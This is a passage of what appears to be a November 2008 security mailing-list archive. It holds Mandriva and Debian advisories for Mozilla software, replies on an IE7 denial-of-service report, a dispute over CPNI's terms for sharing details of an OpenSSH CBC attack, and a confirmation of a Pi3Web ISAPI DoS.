 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5016
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5017
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5018
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5022
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5024
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5052
 http://www.mozilla.org/security/known-vulnerabilities/thunderbird20.html
 ___

 Updated Packages:

 Mandriva Linux 2008.1:
 4dbcbe76c3f449d704d34e924fc6a44c  
2008.1/i586/mozilla-thunderbird-2.0.0.18-0.1mdv2008.1.i586.rpm
 e42314d7ed8d70259878527ac0ffd4c8  
2008.1/i586/mozilla-thunderbird-af-2.0.0.18-1.1mdv2008.1.i586.rpm
 ef06c31fd0f85a52cdaaf60410be5a20  
2008.1/i586/mozilla-thunderbird-be-2.0.0.18-1.1mdv2008.1.i586.rpm
 5b27502980dd7f297e689ee1c7a7f65d  
2008.1/i586/mozilla-thunderbird-bg-2.0.0.18-1.1mdv2008.1.i586.rpm
 6588be4f30aafeadf81a9a4391bb3ec3  
2008.1/i586/mozilla-thunderbird-ca-2.0.0.18-1.1mdv2008.1.i586.rpm
 10c52e9184c3905077916f9c00ad16d1  
2008.1/i586/mozilla-thunderbird-cs-2.0.0.18-1.1mdv2008.1.i586.rpm
 f2e2514a8460f10dd42e9ff0b55587ab  
2008.1/i586/mozilla-thunderbird-da-2.0.0.18-1.1mdv2008.1.i586.rpm
 4322b77dc052303394839d2fea6b7196  
2008.1/i586/mozilla-thunderbird-de-2.0.0.18-1.1mdv2008.1.i586.rpm
 9fe2e12dfef008b8574b29c59beabb5d  
2008.1/i586/mozilla-thunderbird-devel-2.0.0.18-0.1mdv2008.1.i586.rpm
 fd3f295fdf12176362dfea27897f831e  
2008.1/i586/mozilla-thunderbird-el-2.0.0.18-1.1mdv2008.1.i586.rpm
 5211c7c15e766387594daf84971dc50c  
2008.1/i586/mozilla-thunderbird-en_GB-2.0.0.18-1.1mdv2008.1.i586.rpm
 3812339c0d576eaedc666cfc3eb3417d  
2008.1/i586/mozilla-thunderbird-enigmail-2.0.0.18-0.1mdv2008.1.i586.rpm
 4273fcb9b420c4866f522be4e191481f  
2008.1/i586/mozilla-thunderbird-enigmail-ar-2.0.0.18-1.1mdv2008.1.i586.rpm
 c3f6b66c9e1edbbcef55a6b86fa16088  
2008.1/i586/mozilla-thunderbird-enigmail-ca-2.0.0.18-1.1mdv2008.1.i586.rpm
 75563c129897544b64aeae047c1c11dd  
2008.1/i586/mozilla-thunderbird-enigmail-cs-2.0.0.18-1.1mdv2008.1.i586.rpm
 1931445274dd210b9f0b7ad2c8a8b819  
2008.1/i586/mozilla-thunderbird-enigmail-de-2.0.0.18-1.1mdv2008.1.i586.rpm
 f11cbc0862625a0e849889c7e430fed9  
2008.1/i586/mozilla-thunderbird-enigmail-el-2.0.0.18-1.1mdv2008.1.i586.rpm
 3ca5d69f06b202657b30a707f663f540  
2008.1/i586/mozilla-thunderbird-enigmail-es-2.0.0.18-1.1mdv2008.1.i586.rpm
 b858d3227153f7a574bc58dd49fec328  
2008.1/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.18-1.1mdv2008.1.i586.rpm
 9c8f7c0eb5f02726646d4bcb64082e03  
2008.1/i586/mozilla-thunderbird-enigmail-fi-2.0.0.18-1.1mdv2008.1.i586.rpm
 40a7080f8e9501a8a5e6416ba2504cdc  
2008.1/i586/mozilla-thunderbird-enigmail-fr-2.0.0.18-1.1mdv2008.1.i586.rpm
 f7e0a6ea58ef1074cadc1f9931c0b4b7  
2008.1/i586/mozilla-thunderbird-enigmail-hu-2.0.0.18-1.1mdv2008.1.i586.rpm
 b24917105118bc4ce79d96ece554465b  
2008.1/i586/mozilla-thunderbird-enigmail-it-2.0.0.18-1.1mdv2008.1.i586.rpm
 36c3ee1e4f4869e643be9224defce6af  
2008.1/i586/mozilla-thunderbird-enigmail-ja-2.0.0.18-1.1mdv2008.1.i586.rpm
 7575a6cff93362e3007e6d01b987d68e  
2008.1/i586/mozilla-thunderbird-enigmail-ko-2.0.0.18-1.1mdv2008.1.i586.rpm
 a68166dd01dfeb1bc81a4c349a452fa8  
2008.1/i586/mozilla-thunderbird-enigmail-nb-2.0.0.18-1.1mdv2008.1.i586.rpm
 30c0af7936f2dfac07bd276181e6d92a  
2008.1/i586/mozilla-thunderbird-enigmail-nl-2.0.0.18-1.1mdv2008.1.i586.rpm
 1ac55f0b08c53ba3a2b1fce250ba2c6f  
2008.1/i586/mozilla-thunderbird-enigmail-pl-2.0.0.18-1.1mdv2008.1.i586.rpm
 5a6b4ede4433a253afcfe20579b2d0c8  
2008.1/i586/mozilla-thunderbird-enigmail-pt-2.0.0.18-1.1mdv2008.1.i586.rpm
 5c9a440ac89adf1e5814b4facd18f45c  
2008.1/i586/mozilla-thunderbird-enigmail-pt_BR-2.0.0.18-1.1mdv2008.1.i586.rpm
 0581eafe5d505aa256ce2748d8814f0a  
2008.1/i586/mozilla-thunderbird-enigmail-ro-2.0.0

Re: MS Internet Explorer 7 Denial Of Service Exploit

2008-11-24 Thread Nick Kirby

[EMAIL PROTECTED] wrote:

> On Konqueror 3.5.9, what happens is that this childish code builds a huge 
> string, eats memory, causes swapping, and finally blows away Konq.  Linux and X 
> and everything else stay up and recover nicely.  (Gentoo/AMD64X2/3G mem)
> 
> This isn't an exploit -- at least not on Linux -- it's just kiddie stupidity.  
> It doesn't take any particular cleverness to blow memory by dynamically 
> creating bigger and bigger data structures.  With virtual memory and 64-bit 
> pointers, when exactly do we return -ENOMEM?

Could you be a bit more specific as to the circumstances of the DOS 
exploit and how this could be replicated?

Thank you.



Re: Re: Re: MS Internet Explorer 7 Denial Of Service Exploit

2008-11-24 Thread 0xjbrown41
Not promoting this bug in any way in particular, but browsers should be stable 
enough to take input and process it without getting 'blown' away. IMHO just 
because it 'crashes' doesn't mean it's an exploit; just because there is no 
fault doesn't make it not an issue.


[SECURITY] [DSA 1669-1] New xulrunner packages fix several vulnerabilities

2008-11-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1669-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 23, 2008 http://www.debian.org/security/faq
- 

Package: xulrunner
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2008-0016 CVE-2008-3835 CVE-2008-3836 CVE-2008-3837 
CVE-2008-4058 CVE-2008-4059 CVE-2008-4060 CVE-2008-4061 CVE-2008-4062 
CVE-2008-4065 CVE-2008-4066 CVE-2008-4067 CVE-2008-4068 CVE-2008-4069 
CVE-2008-4582 CVE-2008-5012 CVE-2008-5013 CVE-2008-5014 CVE-2008-5017 
CVE-2008-5018 CVE-2008-0017 CVE-2008-5021 CVE-2008-5022 CVE-2008-5023 
CVE-2008-5024

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-0016

   Justin Schuh, Tom Cross and Peter Williams discovered a buffer
   overflow in the parser for UTF-8 URLs, which may lead to the
   execution of arbitrary code.

CVE-2008-3835

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLDocument::OnChannelRedirect() could by bypassed.

CVE-2008-3836

   "moz_bug_r_a4" discovered that several vulnerabilities in
   feedWriter could lead to Chrome privilege escalation.

CVE-2008-3837

   Paul Nickerson discovered that an attacker could move windows
   during a mouse click, resulting in unwanted action triggered by
   drag-and-drop.

CVE-2008-4058

   "moz_bug_r_a4" discovered a vulnerability which can result in
   Chrome privilege escalation through XPCNativeWrappers.

CVE-2008-4059

   "moz_bug_r_a4" discovered a vulnerability which can result in
   Chrome privilege escalation through XPCNativeWrappers.

CVE-2008-4060

   Olli Pettay and "moz_bug_r_a4" discovered a Chrome privilege
   escalation vulnerability in XSLT handling.

CVE-2008-4061

   Jesse Ruderman discovered a crash in the layout engine, which might
   allow the execution of arbitrary code.

CVE-2008-4062

   Igor Bukanov, Philip Taylor, Georgi Guninski and Antoine Labour
   discovered crashes in the Javascript engine, which might allow the
   execution of arbitrary code.

CVE-2008-4065

   Dave Reed discovered that some Unicode byte order marks are
   stripped from Javascript code before execution, which can result in
   code being executed which was otherwise part of a quoted string.

CVE-2008-4066

   Gareth Heyes discovered that some Unicode surrogate characters are
   ignored by the HTML parser.

CVE-2008-4067

   Boris Zbarsky discovered that resource: URLs allow directory
   traversal when using URL-encoded slashes.

CVE-2008-4068

   Georgi Guninski discovered that resource: URLs could bypass local
   access restrictions.

CVE-2008-4069

   Billy Hoffman discovered that the XBM decoder could reveal
   uninitialised memory.

CVE-2008-4582

   Liu Die Yu discovered an information leak through local shortcut
   files.

CVE-2008-5012

   Georgi Guninski, Michal Zalewski and Chris Evans discovered that
   the canvas element could be used to bypass same-origin
   restrictions.

CVE-2008-5013

   It was discovered that insufficient checks in the Flash plugin glue
   code could lead to arbitrary code execution.

CVE-2008-5014

   Jesse Ruderman discovered that a programming error in the
   window.__proto__.__proto__ object could lead to arbitrary code
   execution.

CVE-2008-5017

   It was discovered that crashes in the layout engine could lead to
   arbitrary code execution.

CVE-2008-5018

   It was discovered that crashes in the Javascript engine could lead to
   arbitrary code execution.

CVE-2008-0017
   
   Justin Schuh discovered that a buffer overflow in http-index-format
   parser could lead to arbitrary code execution.

CVE-2008-5021

   It was discovered that a crash in the nsFrameManager might lead to
   the execution of arbitrary code.

CVE-2008-5022

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLHttpRequest::NotifyEventListeners() could be bypassed.

CVE-2008-5023

   Collin Jackson discovered that the -moz-binding property bypasses
   security checks on codebase principals.

CVE-2008-5024

   Chris Evans discovered that quote characters were improperly
   escaped in the default namespace of E4X documents.

For the stable distribution (etch), these problems have been fixed in
version 1.8.0.15~pre080614h-0etch1. Packages for mips will be provided
later.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), these problems have been fixed in version 1.9.0.4-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referen

Re: OpenSSH security advisory: cbc.adv

2008-11-24 Thread Otto Moerbeek
On Fri, Nov 21, 2008 at 03:19:03AM -0700, Damien Miller wrote:

> OpenSSH Security Advisory: cbc.adv
> 
> Regarding the "Plaintext Recovery Attack Against SSH" reported as
> CPNI-957037[1]:
> 
> The OpenSSH team has been made aware of an attack against the SSH
> protocol version 2 by researchers at the University of London.
> Unfortunately, due to the report lacking any detailed technical
> description of the attack and CPNI's unwillingness to share necessary
> information, we are unable to properly assess its impact.

It is really sad researchers are prevented from sharing details with
developers by some lame institute. The OpenSSH developers were asked to
undersign the document below. Apart from asking to be cited as the
discoverer of a vulnerability, I would say that "you will only get
details if you do X" is a form of blackmail.

So the result is that the developers of the main implementation of the
SSH protocol are without the details of the vulnerability, all in the
cause of "protecting national security".

-Otto

=

Centre for the Protection of National Infrastructure
Framework for Vulnerability Information Sharing

Introduction

CPNI was formed from the merger of the National Infrastructure
Security Co-ordination Centre (NISCC) and the National Security
Advice Centre (NSAC).

CPNI provides integrated security advice (combining information,
personnel and physical) to the businesses and organisations which
make up the national infrastructure. Through the delivery of this
advice, we protect national security.

One of the primary CPNI functions is to establish long-term
partnerships with those companies that provide CNI services. This
relationship is reinforced on a regular basis by the provision of various
CPNI advisory materials on IT-related threats and vulnerabilities.
CPNI conducts extensive research into vulnerabilities, the results of
which we share with both CNI organisations and product suppliers. To
enable us to share such information in confidence, CPNI provides this
non-legally binding Framework as a mechanism to establish trusted
partnerships.

This Framework is intended to help CPNI and commercial organisations
to work in partnership to discuss and resolve issues arising from
vulnerability disclosures. By adhering to this framework you will be
part of a mechanism through which technical and commercial
vulnerability information can be shared between partners.
This Framework is intended to increase the flow of vulnerability
information within a trusted environment whereby issues can be
solved quickly and easily, while at the same time limiting the likelihood
of uncontrolled public release.

The Traffic Light Protocol

CPNI has agreed a labelling mechanism known as the "Traffic Light
Protocol" (TLP) with members of its Information Exchanges. This same
protocol has now been accepted as a model for trusted information
exchange by over 30 other countries. The protocol provides for four
"information sharing levels" for the handling of sensitive information.
The four information sharing levels are:
   # RED - Personal for named recipients only. In the context of a
     meeting, for example, RED information is limited to those
     present. In most circumstances RED information will be passed
     verbally or in person.
   # AMBER - Limited distribution. The recipient may share AMBER
     information with others within their organization, but only on a
     "need-to-know" basis.
   # GREEN - Community wide. Information in this category can be
     circulated widely within a particular community. However, the
     information may not be published or posted on the Internet, nor
     released outside of the community.
   # WHITE - Unlimited. Subject to standard copyright rules, WHITE
     information may be distributed freely, without restriction.

Framework for the exchange of Vulnerability Information

This framework is not a legal contract. It is a statement of the
requirements for information sharing between CPNI and the receiving
organisation.
The Centre for the Protection of National Infrastructure (CPNI) and the
receiving organization jointly agree:
   # to label vulnerability information to be shared with one of the
     four "information sharing levels" identified in the Traffic Light
     Protocol (TLP);
   # where necessary and appropriate to protectively mark the
     information in line with their own internal security policies and in
     accordance with the TLP;
   # to use the same degree of care to maintain confidentiality of
     shared vulnerability information as is used for their own internal
     or commercially sensitive information;
   # neither directly nor indirectly disclose to a third party in advance
     of the agreed public disclosure date, either the existence of, or
     details pertaining to, vulnerability infor

Revised: OpenSSH security advisory: cbc.adv

2008-11-24 Thread Damien Miller
Hi,

There was an error in the original advisory. The estimate of 32768
attempts to carry out a successful attack is incorrect. The correct
estimate is 11356 attempts. A revised version is now available at:
http://www.openssh.com/txt/cbc.adv

The advisory and its recommendations are otherwise unchanged.

-d



Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

2008-11-24 Thread tecklord
Vulnerability is confirmed on Pi3Web 2.03 PL 2. If an attacker sends a request 
to one of the files in the isapi directory, the dialog box appears on the host 
system. Until the OK button on the host system is pressed, Pi3Web does not 
serve any requests. There is no application crash, but technically, it's a DoS.